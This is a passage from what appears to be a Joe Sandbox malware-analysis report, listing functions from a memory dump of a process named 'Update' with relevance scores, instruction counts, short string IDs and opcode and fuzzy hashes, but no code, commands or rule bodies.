                                                    • Opcode ID: 5894f8be2f5937d12795f26cd6e68b03ef252d499d6e1e3296dac8aa2d61a906
                                                    • Instruction ID: 75f9db9f01ed3677b1863100bd06c3231c63dca6f22102016833bde19262174d
                                                    • Opcode Fuzzy Hash: 5894f8be2f5937d12795f26cd6e68b03ef252d499d6e1e3296dac8aa2d61a906
                                                    • Instruction Fuzzy Hash: 6E917631A1DA4A0FE329A76898591BA77E1FF85351F1441BFD44EC31D7EE3868838389
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3A9FA Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: zL_L
                                                    • API String ID: 0-504342368
                                                    • Opcode ID: c4fee29fe0c4269160998bd195a6e7bd2a26a99348712cff4b501d25be963d6c
                                                    • Instruction ID: a0b91980f7b11ca0c1c5821c66899d89ed37b4b2b008465d3dd91520e5a0d527
                                                    • Opcode Fuzzy Hash: c4fee29fe0c4269160998bd195a6e7bd2a26a99348712cff4b501d25be963d6c
                                                    • Instruction Fuzzy Hash: CE812872E1CE495FE759EB2858562BD7BE1EF99790F0401BBD40DC32C2DE2898828745
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3BE00 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ^[H
                                                    • API String ID: 0-2216552088
                                                    • Opcode ID: a999ea3806b3a386e3448caa2295496c5a8cc319fa984d0aa6dd93cf0d046078
                                                    • Instruction ID: b922a8bd993191c714e3124209f8fb3367a357640568ece66cd437cbf49bb9c6
                                                    • Opcode Fuzzy Hash: a999ea3806b3a386e3448caa2295496c5a8cc319fa984d0aa6dd93cf0d046078
                                                    • Instruction Fuzzy Hash: 14712821E1EA864FE359A73C68266753BD1EF96640F1802BFD04CC32D7DE1C9C068356
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F31D75 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0CH
                                                    • API String ID: 0-3281614211
                                                    • Opcode ID: 439b64111ae9ad1d24722b8fa8b50fa4273c7d5d5adc461e484191abc76aebe0
                                                    • Instruction ID: f0201957bf7cc060461013a794f2199e98aa7a38f4f1bb82f019ea956474ce18
                                                    • Opcode Fuzzy Hash: 439b64111ae9ad1d24722b8fa8b50fa4273c7d5d5adc461e484191abc76aebe0
                                                    • Instruction Fuzzy Hash: F6611532E1E98A4FE395E73C98951B57BE1EF95250B0842FBD00DC71D7DF19A88A8380
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4E5F0 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =K_H
                                                    • API String ID: 0-451810680
                                                    • Opcode ID: 06e74c419375a8f6cef9e5bd1442ef9ed431502fc7d8d8519e74d4fefb81f4fd
                                                    • Instruction ID: e9c760bbea5108e56cf37ee600384f461b43dcd05b0b292583a8a4619f0bc79e
                                                    • Opcode Fuzzy Hash: 06e74c419375a8f6cef9e5bd1442ef9ed431502fc7d8d8519e74d4fefb81f4fd
                                                    • Instruction Fuzzy Hash: 8A81B231E1CA4A8FEB98EF2894545B537A1FF68764F2402AAD41DD72C2DF39E842C744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4F165 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: p*I
                                                    • API String ID: 0-2707685067
                                                    • Opcode ID: 7dc4432fff911bfe37110300299543ba932fac45ecc11b7662aa2fc41e895995
                                                    • Instruction ID: 79bf07ac0ac5b131a8770f89b264fa4f15354cf93ff746f2a6ad01c7bc8b9e84
                                                    • Opcode Fuzzy Hash: 7dc4432fff911bfe37110300299543ba932fac45ecc11b7662aa2fc41e895995
                                                    • Instruction Fuzzy Hash: EA61EF31A1DA4A4FEB58AB28985567637E1FF65750F0441BBD84EC32C7EF28B8028785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4B688 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: xBI
                                                    • API String ID: 0-571690172
                                                    • Opcode ID: 2de1c2e259ca71ac7745c916e876a3db3f793e4db410eff08645258da419a552
                                                    • Instruction ID: a722a5f2516451c91f7c5d64a222f8bc9c5c4dcd92d5869ec00575cc46d4fd91
                                                    • Opcode Fuzzy Hash: 2de1c2e259ca71ac7745c916e876a3db3f793e4db410eff08645258da419a552
                                                    • Instruction Fuzzy Hash: 2661E431A0DA4A4FE798FF28A4541B5B7D0FFD5690F1401BBD809C72C3EE19AC468385
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F38B78 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H
                                                    • API String ID: 0-2852464175
                                                    • Opcode ID: a9dbdea06447911f840e365ebeb8160512dcd5193a9e51b8408a37043a47652b
                                                    • Instruction ID: 681ef30688514757f3f240ccbd59323549c66474416fd9ce5c6b0c9f69be429f
                                                    • Opcode Fuzzy Hash: a9dbdea06447911f840e365ebeb8160512dcd5193a9e51b8408a37043a47652b
                                                    • Instruction Fuzzy Hash: F4614A32D0DE8A0FE7A5A72898552BA7BE1FFA5760F0401BBD44CD31D3EF2968064785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F32369 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH
                                                    • API String ID: 0-1579723087
                                                    • Opcode ID: 490201cebd5fc463125bc747882ce02ede974aa5b1ff3e0e86aab52d384c6816
                                                    • Instruction ID: d80181e98b0f385fb57105dbf6e272a5e231c24f282d66b4586e403bc2ff0644
                                                    • Opcode Fuzzy Hash: 490201cebd5fc463125bc747882ce02ede974aa5b1ff3e0e86aab52d384c6816
                                                    • Instruction Fuzzy Hash: 1361F531A0DA8A4FE7A5EB6C986527477E1FF95341F1801FBC049C71D7CB28AC468785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F387F8 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L_^f
                                                    • API String ID: 0-395306403
                                                    • Opcode ID: 8e9755c481ed6f9e7f946e5a9995e7937c62e6632084fa511dde9faabd8c19b7
                                                    • Instruction ID: ee750d98f30ab670c7c775736d0a9c4ff6ce1762dff4b895131d78065521934f
                                                    • Opcode Fuzzy Hash: 8e9755c481ed6f9e7f946e5a9995e7937c62e6632084fa511dde9faabd8c19b7
                                                    • Instruction Fuzzy Hash: EC511431A2C9098FDB58FB2894026F977E0FF98391F44063ED44ED32D2DF28A8069785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4DC85 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH
                                                    • API String ID: 0-1579723087
                                                    • Opcode ID: 10f7e73897f37f21e3396b44c239236f27bb1ad4c98563b563fd1f64caae5bc3
                                                    • Instruction ID: 635cee406de82b12b9cd3b505ce07a63d7c80e2cff56705e7e4dc7ce8bf256e4
                                                    • Opcode Fuzzy Hash: 10f7e73897f37f21e3396b44c239236f27bb1ad4c98563b563fd1f64caae5bc3
                                                    • Instruction Fuzzy Hash: A2511A31E1EE8A2FE79AF72C58556B67BE0EFA5650B0402BBD009C31D7DE1D99068344
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F42930 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H
                                                    • API String ID: 0-2852464175
                                                    • Opcode ID: 6ef4b0ed94ca1b3390d3f4bb7eb6fb010f87ce90baaad5e97656d5462c672346
                                                    • Instruction ID: 2ef2b0222e3db1c113ca12cabec58fd12bcf52083e9e17ebb1ec5782793314b5
                                                    • Opcode Fuzzy Hash: 6ef4b0ed94ca1b3390d3f4bb7eb6fb010f87ce90baaad5e97656d5462c672346
                                                    • Instruction Fuzzy Hash: 6141263290FA8A0FEB62A73858415A57BE0FFB67A8F0401B7C01EE71D3DE18180A8355
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F38800 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L_^f
                                                    • API String ID: 0-395306403
                                                    • Opcode ID: 30244945d579022ec74a96c66fb5f0df9c8f16545ce489db05a3bb09ff6f338a
                                                    • Instruction ID: 0baf200fe74e1c71a34a51c81d30d8906db8261ec39645b73ce05e0e3a8cce56
                                                    • Opcode Fuzzy Hash: 30244945d579022ec74a96c66fb5f0df9c8f16545ce489db05a3bb09ff6f338a
                                                    • Instruction Fuzzy Hash: C1210432A3D4164EE364B758A4065E977D0EB943F2F54037AD10CD7292DE6CA8478299
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F47D53 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: KK_^
                                                    • API String ID: 0-4007865519
                                                    • Opcode ID: 535dc0bd77dbe2fc2f890f131a5322b5b00b1e711c2922f43e6287bd044b1bbd
                                                    • Instruction ID: d09562b1b79c8be799ec45411a9dcbf66d2b6abcc01ad28247dcc18dbe8959d0
                                                    • Opcode Fuzzy Hash: 535dc0bd77dbe2fc2f890f131a5322b5b00b1e711c2922f43e6287bd044b1bbd
                                                    • Instruction Fuzzy Hash: E7C0C072D1CCCE1ACD417B203C014F933A0E730B80F440062D009A7382DF0494434B42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F31375 Relevance: .6, Instructions: 621COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64150fe29dd67ebcb13902fdfc76b2388b2fb827a56db891c4e47add8b2f5fff
                                                    • Instruction ID: 63a2320cf38a9b3a896e1ff865f2f523156366a9771ad71695df77c6dda06c09
                                                    • Opcode Fuzzy Hash: 64150fe29dd67ebcb13902fdfc76b2388b2fb827a56db891c4e47add8b2f5fff
                                                    • Instruction Fuzzy Hash: 1D12D521A1E9895FEB99FB2C84559793BE0EF95780F0400BFE54DC72C3DE1CA94A4389
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F38542 Relevance: .6, Instructions: 551COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74eacfbcc91ab6b395c49d99971a5f1042035c997c5f997a6cf570e86bba303f
                                                    • Instruction ID: fc32c04e26240150cc70de09d075689806cb19068d03e4a84f6ebd4e5a76baa9
                                                    • Opcode Fuzzy Hash: 74eacfbcc91ab6b395c49d99971a5f1042035c997c5f997a6cf570e86bba303f
                                                    • Instruction Fuzzy Hash: 27F1673191DAC54FE356AB3898155B17BE1EF52260F0802FBD09DCB2D3DE18A8468792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3C577 Relevance: .5, Instructions: 451COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c5e4eca978188ba71fb0c6241c2fca23adbc13fa196a48d6157235376beb40e
                                                    • Instruction ID: 6c7fd1afbbbbaefb338acf5bbdfb1ab09a4c27c99ba7231c956fb1291f9ee43e
                                                    • Opcode Fuzzy Hash: 1c5e4eca978188ba71fb0c6241c2fca23adbc13fa196a48d6157235376beb40e
                                                    • Instruction Fuzzy Hash: FEE1F43190CA8E8FDB85EF28C8556E97BE1FF59350F14017AD449C72D1EB39A912CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F491D3 Relevance: .4, Instructions: 437COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 333e22e991cec484fbeba6c2ddc1453b8084bc1140ed5ae5e7e2f28412f4e538
                                                    • Instruction ID: 974231c460cf101989d58a3b53403029e8dfb9f49a9bc520b321d97cc814f44d
                                                    • Opcode Fuzzy Hash: 333e22e991cec484fbeba6c2ddc1453b8084bc1140ed5ae5e7e2f28412f4e538
                                                    • Instruction Fuzzy Hash: A0D1E331F0D9498FEB89EB289455AB977E1FFA9740F1401BED04DC76E2DE28A842C744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3191E Relevance: .4, Instructions: 395COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 413ab5aec94c217b958d722499a78e99efe94aaa71fc3de7aaa7aa2794494eaa
                                                    • Instruction ID: 2e35395c1cd43147945839e70d7ff72862f5ab5fc548e22cb8055eeafa5cd7c4
                                                    • Opcode Fuzzy Hash: 413ab5aec94c217b958d722499a78e99efe94aaa71fc3de7aaa7aa2794494eaa
                                                    • Instruction Fuzzy Hash: 31C1D421A1E9895FEB99FB2C8455A783BD0EB65785F0400BFD50DC72C3DE2CA94A4389
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F42DB9 Relevance: .4, Instructions: 393COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb410ac669a2abc688b5edd9aaa7ae8819afca4ce4ead7aba18a46e0fa7c0404
                                                    • Instruction ID: bcf4688ae9ffa3716e5997092561bd0c750bd42092ee079ad239f8b929af4bc7
                                                    • Opcode Fuzzy Hash: cb410ac669a2abc688b5edd9aaa7ae8819afca4ce4ead7aba18a46e0fa7c0404
                                                    • Instruction Fuzzy Hash: AED1E43090CA4E8FDB95EF28C855AEA77E1FF69750F00027AD449D72D6DB39A846C780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4B590 Relevance: .4, Instructions: 376COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40e14878b3756a37b717969a7ce5947a87eb6647b06de67248aaece2dc85c32a
                                                    • Instruction ID: 208fcec69c2bec31ef4892e6024c9a9d933e6b4519af9d98d404195bce00b61b
                                                    • Opcode Fuzzy Hash: 40e14878b3756a37b717969a7ce5947a87eb6647b06de67248aaece2dc85c32a
                                                    • Instruction Fuzzy Hash: 0CC14F30718E498FD798EB2DC498A75B7E1FF6835171506AAE04EC76B6DB24EC41C740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F36227 Relevance: .4, Instructions: 368COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c36f9a9f1a21c2bf3f338586ab6864a3614551e6b5fb7b65d1213333036b314
                                                    • Instruction ID: 2030da9b73001f37e8ef542f7dfae63dddbb0e898d0a4fe1a591dcecbce3fc9a
                                                    • Opcode Fuzzy Hash: 9c36f9a9f1a21c2bf3f338586ab6864a3614551e6b5fb7b65d1213333036b314
                                                    • Instruction Fuzzy Hash: 56B14A72E0DA864FE794AB2CA85A1F97BA0EF953A4F0401BBC04DC71D3EF1D68468355
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4B81D Relevance: .4, Instructions: 354COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e59f45c6f9673b3f7f841115494f2569ae1b031208e230f54e3816b3adc7f4d
                                                    • Instruction ID: 2018acc0a986be8655a95065cb183c6136c5374a2324710c671cae1751205c46
                                                    • Opcode Fuzzy Hash: 5e59f45c6f9673b3f7f841115494f2569ae1b031208e230f54e3816b3adc7f4d
                                                    • Instruction Fuzzy Hash: 5EB18131A2CA4A8FDB98EF28C8955A673A1FFA8754F10416AD41EC72C7DF35E842C744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F4CBC5 Relevance: .4, Instructions: 351COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65b548c5919bcd8957951a525449e40ab9b6d21dd7dd716f6750ab789ad25f5c
                                                    • Instruction ID: 7d29b49528d9180b6b525c5c2d3c2a673fd1bf920409d0bc88cee793788f5866
                                                    • Opcode Fuzzy Hash: 65b548c5919bcd8957951a525449e40ab9b6d21dd7dd716f6750ab789ad25f5c
                                                    • Instruction Fuzzy Hash: 92B14B30B18E498FD798EB2DC498A75B7E1FF6831175502ABE04AC76B6DB24EC41CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3C145 Relevance: .3, Instructions: 347COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3b646b68deba63c7c87ab5a3ecca93f9a2e1b90125623420c6f6f65fb999399
                                                    • Instruction ID: ea399e12f28b20bbd11d0992e3e76821e76edffc9254b9050c87555a8c70c9c8
                                                    • Opcode Fuzzy Hash: d3b646b68deba63c7c87ab5a3ecca93f9a2e1b90125623420c6f6f65fb999399
                                                    • Instruction Fuzzy Hash: 89C15335A18A4E8FDF85EF18C891AEA73B1FF58340F104669E419D7296DF35E852CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F39C35 Relevance: .3, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0807d699fd16620617edc70c0d561fe3e5a6d7ec2ef1910699218eece414fcb3
                                                    • Instruction ID: ac01fc2d8e68470ba170d6fe5c845f56814bd37020f0c73e4aba6c004779fb72
                                                    • Opcode Fuzzy Hash: 0807d699fd16620617edc70c0d561fe3e5a6d7ec2ef1910699218eece414fcb3
                                                    • Instruction Fuzzy Hash: E9916532F1DD8B4FE3A6A72C58952B12BD1EF66690F1841BBC04CC3ACBDE199C418384
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F3F595 Relevance: .3, Instructions: 330COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60e749d6725eb79008994dec3d1d97e13346189170ee819d43f509868caad7ad
                                                    • Instruction ID: 85b37f955f89e0a28c64e9546407354144cccab6c0867220aafaf429abd60d06
                                                    • Opcode Fuzzy Hash: 60e749d6725eb79008994dec3d1d97e13346189170ee819d43f509868caad7ad
                                                    • Instruction Fuzzy Hash: 33B1033090DA8A4FDB96EF2488156E67BE1FF4A350F0405ABD859CB1D7CB39A806C781
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F38245 Relevance: .3, Instructions: 318COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f06a2d696e6c2a5e1dd39c8e6bb41ccf421a70ab10e0804979c005e29697aa3
                                                    • Instruction ID: 9de814f905251440ce5e114bb466876b6bcc7eb80c2f2173307af49bbd860fd7
                                                    • Opcode Fuzzy Hash: 1f06a2d696e6c2a5e1dd39c8e6bb41ccf421a70ab10e0804979c005e29697aa3
                                                    • Instruction Fuzzy Hash: B0A11671A2E98A4FDB85EB3898555BA7BA1FF95340F4445BED00EC72C6DF28E8068740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F47D09 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7febd3574e2dd8ab5bd57695e6a316ecffef5b886b66a26866ac7746d403812a
                                                    • Instruction ID: 609bde85e86ff154227f8a57645c5bd247a0ef4e5be599ebba52b63621d46c7e
                                                    • Opcode Fuzzy Hash: 7febd3574e2dd8ab5bd57695e6a316ecffef5b886b66a26866ac7746d403812a
                                                    • Instruction Fuzzy Hash: 6891E231D0DE5E4FEB69AB2498066FA77E0EFA5790F04027BD44CE71D2DF2868068785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00007FF848F49AD3 Relevance: .3, Instructions: 305COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
